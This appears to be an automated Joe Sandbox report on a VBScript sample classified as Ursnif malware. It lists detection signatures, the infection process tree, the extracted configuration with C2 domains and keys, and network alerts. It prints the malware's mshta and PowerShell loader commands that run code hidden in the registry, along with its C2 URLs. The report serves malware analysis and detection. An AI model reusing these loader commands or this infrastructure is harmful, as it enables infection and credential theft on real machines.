Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 345678.vbs

Overview

General Information

Sample Name:345678.vbs
Analysis ID:481077
MD5:9e6b216f5112b583f035ac621c78ea4e
SHA1:8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
SHA256:cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3868 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 6000 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6072 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 2896 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 4612 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • WmiPrvSE.exe (PID: 6716 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 6844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 6556 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6948 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7060 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7080 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 4016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3208 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 6256 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
    00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 36 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.3.rundll32.exe.50ba4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              21.3.rundll32.exe.50ba4a0.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                21.3.rundll32.exe.5168d48.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  21.3.rundll32.exe.51394a0.3.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Encoded IEXShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: MSHTA Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: Mshta Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6948, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', ProcessId: 7060
                    Sigma detected: Suspicious Rundll32 ActivityShow sources
                    Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2896, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4612
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132757666291999114.6948.DefaultAppDomain.powershell

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell run code from registryShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/eAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/tAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMwAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyTAvira URL Cloud: Label: malware
                    Found malware configurationShow sources
                    Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: atl.bigbigpoppa.comVirustotal: Detection: 8%Perma Link
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,21_2_00E53276
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,21_2_05591802
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,21_2_05581577
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,21_2_055714A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,21_2_05586E4E

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49787 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49787 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49788 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49788 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49789 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49789 -> 185.251.90.253:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80Jump to behavior
                    Uses nslookup.exe to query domainsShow sources
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
